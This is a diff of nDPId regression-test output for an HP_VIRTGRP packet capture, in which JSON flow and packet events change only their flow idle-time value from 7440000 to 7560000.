-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":91,"packets-processed":90,"total-skipped-flows":0,"total-l4-data-len":3481,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1614892184461} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-data-len":4061,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1614894888601} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-data-len":4583,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1614898090218} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="} 